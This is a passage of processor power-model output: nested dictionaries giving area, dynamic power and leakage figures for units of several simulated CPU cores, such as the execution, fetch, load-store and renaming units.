'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.0149292, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.134451, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.378446, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 5.00384, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.108796, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.288142, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.463434, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.269554, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.43478, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.219462, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.923796, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.237241, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.1749, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0875527, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0113063, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127536, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0836169, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.215089, 'Execution Unit/Register Files/Runtime Dynamic': 0.0949232, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.295888, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.662624, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 2.37486, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00103724, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00103724, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000939627, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000383539, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00120116, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00421527, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00865194, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0803831, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.11305, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.196565, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.273017, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.57972, 'Instruction Fetch Unit/Runtime Dynamic': 0.562833, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0107435, 'L2/Runtime Dynamic': 0.00257807, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.59493, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.13633, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0762807, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0762806, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.95514, 'Load Store Unit/Runtime Dynamic': 1.5888, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.188095, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.37619, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0667556, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0668763, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.317911, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0323439, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.588694, 'Memory Management Unit/Runtime Dynamic': 0.0992201, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 20.8987, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.230312, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.0149644, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.134657, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.379933, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 5.00823, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}, {'Area': 32.0201, 'Execution Unit/Area': 7.68434, 'Execution Unit/Complex ALUs/Area': 0.235435, 'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646, 'Execution Unit/Complex ALUs/Peak Dynamic': 0.10861, 'Execution Unit/Complex ALUs/Runtime Dynamic': 0.287996, 'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111, 'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163, 'Execution Unit/Floating Point Units/Area': 4.6585, 'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156, 'Execution Unit/Floating Point Units/Peak Dynamic': 0.461575, 'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033, 'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829, 'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061, 'Execution Unit/Gate Leakage': 0.120359, 'Execution Unit/Instruction Scheduler/Area': 1.66526, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.270625, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453, 'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519, 'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913, 'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223, 'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562, 'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763, 'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.436509, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755, 'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964, 'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262, 'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388, 'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608, 'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451, 'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.220335, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853, 'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446, 'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.927469, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892, 'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346, 'Execution Unit/Integer ALUs/Area': 0.47087, 'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291, 'Execution Unit/Integer ALUs/Peak Dynamic': 0.238751, 'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344, 'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222, 'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833, 'Execution Unit/Peak Dynamic': 5.17507, 'Execution Unit/Register Files/Area': 0.570804, 'Execution Unit/Register Files/Floating Point RF/Area': 0.208131, 'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788, 'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0872014, 'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0113512, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698, 'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968, 'Execution Unit/Register Files/Gate Leakage': 0.000622708, 'Execution Unit/Register Files/Integer RF/Area': 0.362673, 'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992, 'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.127826, 'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0839494, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175, 'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675, 'Execution Unit/Register Files/Peak Dynamic': 0.215027, 'Execution Unit/Register Files/Runtime Dynamic': 0.0953006, 'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387, 'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643, 'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912, 'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402, 'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.296452, 'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.664562, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478, 'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543, 'Execution Unit/Runtime Dynamic': 2.3807, 'Execution Unit/Subthreshold Leakage': 1.79543, 'Execution Unit/Subthreshold Leakage with power gating': 0.688821, 'Gate Leakage': 0.368936, 'Instruction Fetch Unit/Area': 5.85939, 'Instruction Fetch Unit/Branch Predictor/Area': 0.138516, 'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00104668, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00104668, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719, 'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00094767, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344, 'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000386556, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347, 'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045, 'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838, 'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732, 'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05, 'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602, 'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00120594, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505, 'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733, 'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00424697, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703, 'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282, 'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954, 'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758, 'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867, 'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00874871, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682, 'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357, 'Instruction Fetch Unit/Gate Leakage': 0.0589979, 'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323, 'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05, 'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827, 'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0807027, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885, 'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682, 'Instruction Fetch Unit/Instruction Cache/Area': 3.14635, 'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931, 'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.13338, 'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.197733, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022, 'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386, 'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799, 'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493, 'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404, 'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.274103, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943, 'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104, 'Instruction Fetch Unit/Peak Dynamic': 7.60103, 'Instruction Fetch Unit/Runtime Dynamic': 0.565534, 'Instruction Fetch Unit/Subthreshold Leakage': 0.932286, 'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843, 'L2/Area': 4.53318, 'L2/Gate Leakage': 0.015464, 'L2/Peak Dynamic': 0.0106112, 'L2/Runtime Dynamic': 0.00257414, 'L2/Subthreshold Leakage': 0.834142, 'L2/Subthreshold Leakage with power gating': 0.401066, 'Load Store Unit/Area': 8.80901, 'Load Store Unit/Data Cache/Area': 6.84535, 'Load Store Unit/Data Cache/Gate Leakage': 0.0279261, 'Load Store Unit/Data Cache/Peak Dynamic': 3.59737, 'Load Store Unit/Data Cache/Runtime Dynamic': 1.13741, 'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675, 'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085, 'Load Store Unit/Gate Leakage': 0.0350888, 'Load Store Unit/LoadQ/Area': 0.0836782, 'Load Store Unit/LoadQ/Gate Leakage': 0.00059896, 'Load Store Unit/LoadQ/Peak Dynamic': 0.0763597, 'Load Store Unit/LoadQ/Runtime Dynamic': 0.0763598, 'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961, 'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918, 'Load Store Unit/Peak Dynamic': 3.95796, 'Load Store Unit/Runtime Dynamic': 1.59035, 'Load Store Unit/StoreQ/Area': 0.322079, 'Load Store Unit/StoreQ/Gate Leakage': 0.00329971, 'Load Store Unit/StoreQ/Peak Dynamic': 0.18829, 'Load Store Unit/StoreQ/Runtime Dynamic': 0.376581, 'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621, 'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004, 'Load Store Unit/Subthreshold Leakage': 0.591321, 'Load Store Unit/Subthreshold Leakage with power gating': 0.283293, 'Memory Management Unit/Area': 0.4339, 'Memory Management Unit/Dtlb/Area': 0.0879726, 'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729, 'Memory Management Unit/Dtlb/Peak Dynamic': 0.0668247, 'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0669445, 'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699, 'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485, 'Memory Management Unit/Gate Leakage': 0.00808595, 'Memory Management Unit/Itlb/Area': 0.301552, 'Memory Management Unit/Itlb/Gate Leakage': 0.00393464, 'Memory Management Unit/Itlb/Peak Dynamic': 0.319175, 'Memory Management Unit/Itlb/Runtime Dynamic': 0.0325325, 'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758, 'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842, 'Memory Management Unit/Peak Dynamic': 0.590077, 'Memory Management Unit/Runtime Dynamic': 0.0994771, 'Memory Management Unit/Subthreshold Leakage': 0.0766103, 'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333, 'Peak Dynamic': 20.9242, 'Renaming Unit/Area': 0.303608, 'Renaming Unit/FP Front End RAT/Area': 0.131045, 'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123, 'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468, 'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.229387, 'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571, 'Renaming Unit/FP Front End RAT/Subthreshold 